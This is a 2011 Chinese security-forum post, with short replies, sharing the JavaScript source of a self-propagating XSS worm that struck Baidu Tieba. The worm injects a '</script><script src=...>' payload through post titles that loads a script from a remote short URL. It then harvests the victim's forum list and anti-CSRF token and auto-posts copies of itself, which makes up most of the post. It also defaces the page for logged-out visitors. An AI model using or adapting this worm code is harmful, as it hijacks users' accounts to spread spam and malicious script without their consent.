[分享]</script><script>alert('百度标题XSS)</script>-WEB安全-看雪-安全社区|安全招聘|kanxue.com

[分享]</script><script>alert('百度标题XSS)</script>

发表于: 2011-6-26 22:47 4094

[分享]</script><script>alert('百度标题XSS)</script>

方我爱你

2011-6-26 22:47

4094

你懂得`````````
6月26号
百度贴吧出现标题带</script><script/src=//url.cn/26qOE9> 类似的帖子。
而用户点进去这种帖子会被攻击者利用自动发帖。从而达到爆吧的目的！

代码：
function createXHR(){
   return window.XMLHttpRequest?
   new XMLHttpRequest():
   new ActiveXObject("Microsoft.XMLHTTP");
}

function getmyforum(url){
xmlHttp = createXHR();
   xmlHttp.open("GET",url,false);
   xmlHttp.send();
   result = xmlHttp.responseText;
result = result.match(/\/f\?kw=[A-Z0-9\%]*&from=ucenter/g);
return result;
}

function getarg(forumurl){
xmlHttp = createXHR();
   xmlHttp.open("GET",forumurl,false);
   xmlHttp.send();
   result = xmlHttp.responseText;
forumname = result.match("hidden\" name=\"kw\" id=\"kw\" value=\"[^\"]*").toString().split('"')[6];
forumname = encodeURIComponent(forumname);
fid = result.match("hidden\" name=\"fid\" id=\"fid\" value=\"[^\"]*").toString().split('"')[6];
tbs = result.match("PageData.tbs = \"[a-z0-9]+\";").toString().split('"')[1];
return [forumname,fid,tbs];
}

function random_msg(){
   var tarr = new Array(
   '说不过就删帖封号,有意思吗?',
   '这个楼我们一定要盖啊啊啊?',
   '绝对震撼人心的语录,2011年',
   '显然,或者,哦,这事做错了?');
   var carr = new Array(
   ' RT ',
   ' 难道不是吗? ',
   ' 如题',
   '我想说啥来着？？',
   '我爱大清国,我怕他完了....');
   title = tarr[Math.floor(Math.random()*(tarr.length))];
   content = carr[Math.floor(Math.random()*(carr.length))];
   return [encodeURIComponent(title),encodeURIComponent(content)];
}
function main(){
   document.getElementsByTagName('h1')[0].innerHTML = document.getElementsByTagName('h1')[0].innerHTML.split('/scr')[0];
   if(!PageData.is_login){
      tagp = document.getElementsByTagName('p');
      for (i=0;i<tagp.length;i++){
         if(tagp.innerHTML == '1楼'){
               tagp[i+1].innerHTML = 'BS你。看帖不登陆、不回帖、不顶贴的淫,我咒你木有小JJ!!';
               i = tagp.length;

}
      }
      throw 'err';
   }
   myforum = '[url=]http://tieba.baidu.com/f/user/myforum?v='[/url] + new Date().getTime();
   forumarr = getmyforum(myforum);
   wormurl = encodeURIComponent('</script><script/src=//t.cn/aCXCxM>');
   for (i=0;i<forumarr.length;i++){
      msg = random_msg();
      forumurl = '[url=]http://tieba.baidu.com'[/url] + forumarr;
      argarr = getarg(forumurl);
      data = 'kw=' + argarr[0];
      data = data + '&fid=' + argarr[1];
      data = data + '&tid=0&floor_num=0&vcode_md5=&pic_url=&rich_text=1&hasuploadpic=0&picsign=&tfrom=1';
      data = data + '&title=' + msg[0] + wormurl + '&content=' + msg[1] + '%40samy_joke%3Cbr%3E';
      data = data + '&add_post_submit=%20%E5%8F%91%20%E8%A1%A8%20&ie=utf-8';
      data = data + '&tbs=' + argarr[2];
      publish(data);
   }
   followme();
}
var t=setTimeout("main()",3000);

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)

收藏・0

免费・0

支持

最新回复 (3)
demoscene 雪币： 1981 活跃值： (771) 能力值： ( LV13，RANK：420 ) 在线值：发帖 30 回帖 355 粉丝 27 关注私信	demoscene 7 2 楼分析了下 http://hi.baidu.com/demoscene/blog/item/1a65675057ec1d170df3e319.html 2011-6-26 23:11 0
超然雪币： 422 活跃值： (115) 能力值： ( LV8，RANK：130 ) 在线值：发帖 7 回帖 86 粉丝 3 关注私信	超然 3 3 楼好玩的东西。嗯呵呵贴吧常客路过，已经遇见过弹框的了。 2011-6-27 18:01 0
超然雪币： 422 活跃值： (115) 能力值： ( LV8，RANK：130 ) 在线值：发帖 7 回帖 86 粉丝 3 关注私信	超然 3 4 楼去贴吧看了下，貌似漏洞被补上了。 2011-6-27 18:29 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

方我爱你

发帖

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

专注于PC、移动、智能设备安全研究及逆向工程的开发者社区

最新回复 (3)
demoscene 雪币： 1981 活跃值： (771) 能力值： ( LV13，RANK：420 ) 在线值：发帖 30 回帖 355 粉丝 27 关注私信	demoscene 7 2 楼分析了下 http://hi.baidu.com/demoscene/blog/item/1a65675057ec1d170df3e319.html 2011-6-26 23:11 0
超然雪币： 422 活跃值： (115) 能力值： ( LV8，RANK：130 ) 在线值：发帖 7 回帖 86 粉丝 3 关注私信	超然 3 3 楼好玩的东西。嗯呵呵贴吧常客路过，已经遇见过弹框的了。 2011-6-27 18:01 0
超然雪币： 422 活跃值： (115) 能力值： ( LV8，RANK：130 ) 在线值：发帖 7 回帖 86 粉丝 3 关注私信	超然 3 4 楼去贴吧看了下，貌似漏洞被补上了。 2011-6-27 18:29 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复